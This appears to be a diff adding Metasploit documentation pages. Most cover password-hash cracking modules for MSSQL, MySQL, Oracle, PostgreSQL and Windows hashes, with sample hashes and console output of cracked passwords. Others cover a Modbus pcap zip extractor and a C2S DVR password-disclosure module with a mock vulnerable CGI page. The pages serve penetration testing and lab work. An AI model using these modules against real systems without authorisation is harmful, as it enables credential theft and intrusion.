+  SQL based password hashes, such as:
+
+  * `mssql` based passwords
+  * `mssql05` based passwords
+  * `mssql12` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
+creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_mssql_fast 
+msf5 auxiliary(analyze/jtr_mssql_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
+[*] Cracking mssql05 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[*] Cracking mssql hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql_foo:FOO
+[+] mssql_foo:FOO
+[*] Cracking mssql12 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql12_Password1!:Password1!
+[+] mssql12_Password1!:Password1!
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_mssql_fast) > creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
+                       mssql05_toto        toto                                                                                                                                                   Password            
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
+                       mssql_foo           FOO                                                                                                                                                    Password            
+                       mssql_foo           foo                                                                                                                                                    Password            
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
+                       mssql12_Password1!  Password1!                                                                                                                                             Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
+
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
+  based password hashes, such as:
+
+  * `mysql` (pre 4.1) based passwords
+  * `mysql-sha1` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_mysql_fast 
+msf5 auxiliary(analyze/jtr_mysql_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
+[*] Cracking mysql hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mysql_probe:probe
+[*] Cracking mysql-sha1 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mysql-sha1_tere:tere
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_mysql_fast) > creds
+Credentials
+===========
+
+host  origin  service  public           private                                    realm  private_type        JtR Format
+----  ------  -------  ------           -------                                    -----  ------------        ----------
+                       mysql_probe      probe                                             Password            
+                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
+                       mysql-sha1_tere  tere                                              Password            
+                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
+
+```
@@ -0,0 +1,168 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
+  based password hashes, such as:
+
+  * `oracle` (<=10) aka `des` based passwords
+  * `oracle11` based passwords
+  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
+  * `oracle12c` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  For a detailed explanation of Oracle 11/12c formats, see
+  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
+
+  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
+  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
+
+## Verification Steps
+
+  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_oracle_fast 
+msf5 auxiliary(analyze/jtr_oracle_fast) > run
+
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
+[*] Cracking oracle hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] simon:A
+[+] SYSTEM:THALES
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
+[*] Cracking dynamic_1506 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
+[*] Cracking oracle11 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] DEMO:epsilon
+[+] oracle11_epsilon:epsilon
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
+[*] Cracking oracle12c hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] oracle12c_epsilon:epsilon
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_oracle_fast) > creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       simon              A                                                                                                                                                                                                                                                                            Password            
+                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
+                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+
+```
@@ -0,0 +1,131 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
+  based password hashes, such as:
+
+  * `postgres` based passwords
+  * `raw-md5` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
+  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
+
+## Verification Steps
+
+  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_postgres_fast 
+msf5 auxiliary(analyze/jtr_postgres_fast) > run
+
+[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
+[*] Cracking dynamic_1034 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] example:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_postgres_fast) > creds
+Credentials
+===========
+
+host  origin  service  public   private                              realm  private_type  JtR Format
+----  ------  -------  ------   -------                              -----  ------------  ----------
+                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
+                       example  password                                    Password      
+
+```
@@ -0,0 +1,158 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
+  based password hashes, such as:
+
+  * `LM`, or `LANMAN` based passwords
+  * `NT`, `NTLM`, or `NTLANMAN` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `nt` or `lm` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
+creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_windows_fast 
+msf5 auxiliary(analyze/jtr_windows_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
+[*] Cracking lm hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
+Session completed
+[*] Cracking lm hashes in single mode...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
+Session completed
+[*] Cracking lm hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+Using default target encoding: CP850
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
+Session completed
+[*] Cracked Passwords this run:
+[+] lm_password:password
+[*] Cracking nt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking nt hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] lm_password:password
+[+] nt_password:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_windows_fast) > creds
+Credentials
+===========
+
+host  origin  service  public       private                                                            realm  private_type  JtR Format
+----  ------  -------  ------       -------                                                            -----  ------------  ----------
+                       lm_password  password                                                                  Password      
+                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+                       nt_password  password                                                                  Password      
+                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
+
+```
@@ -0,0 +1,34 @@
+## Vulnerable Application
+
+This module is able to extract a zip file sent through Modbus from a pcap.
+
+Tested with Schneider TM221CE16R
+
+## Verification Steps
+
+1. Do: `use auxiliary/analyze/modbus_zip`
+2. Do: `set PCAPFILE <PATH_TO_PCAP>` where PATH_TO_PCAP is the PATH to the pcap file
+3. Do: `exploit` extract the zip file
+
+## Options
+
+**MODE**
+
+Default: UPLOAD. Changes offset within a packet that is used to check for a zip header.
+
+## Scenarios
+
+ ```
+msf > use auxiliary/analyze/modbus_zip
+msf auxiliary(analyze/modbus_zip) > set PCAPFILE file.pcap
+PCAPFILE => file.pcap
+auxiliary(analyze/modbus_zip) > set MODE DOWNLOAD
+MODE => DOWNLOAD
+msf auxiliary(analyze/modbus_zip) > exploit
+[*] Running module against 0.0.0.0
+
+[*] Zip start on packet 1370
+[*] Zip end on packet 1452
+[*] Done!
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,76 @@
+## Description
+
+C2S DVR allows an unauthenticated user to disclose the username
+& password by requesting the javascript page 'read.cgi?page=2'.
+This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.
+
+## Vulnerable Application
+
+This module has been verified against the mock vulnerable page listed below.
+
+### Mock Vulnerable Page
+
+These instructions will create a cgi environment and a vulnerable perl application for exploitation.
+Kali rolling (2019.1) was utilized for this tutorial, with apache.
+
+#### Setup
+
+1. Enable cgi: `a2enmod cgid`
+2. `mkdir /var/www/html/cgi-bin`
+3. Enable folder for cgi execution: add `ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/"` to `/etc/apache2/sites-enabled/000-default.conf ` inside of the `VirtualHost` tags
+4. Create the vulnerable page by writing the following text to `/var/www/html/cgi-bin/read.cgi`:
+
+```
+#!/usr/bin/perl
+use CGI qw(:standard);
+$query = new CGI;
+print $query->header( -type=> "text/javascript"),
+$query->import_names( 'Q' );
+
+my $data = <<'DATA';
+var pw_enflag = "1";
+var pw_adminpw = "12345";
+var pw_retype1 = "12345";
+var pw_userpw = "56789";
+var pw_retype2 = "56789";
+var pw_autolock = "0";
+DATA
+
+if ($Q::page == 2) {
+  print $data;
+}
+```
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use auxiliary/gather/c2s_dvr_password_disclosure```
+3. ```set rhosts [rhosts]```
+4. ```run```
+
+## Scenarios
+
+### Against the Mock page listed above
+
+  ```
+    resource (c2s.rb)> use auxiliary/gather/c2s_dvr_password_disclosure
+    resource (c2s.rb)> set rhosts 127.0.0.1
+    rhosts => 127.0.0.1
+    resource (c2s.rb)> set verbose true
+    verbose => true
+    resource (c2s.rb)> exploit
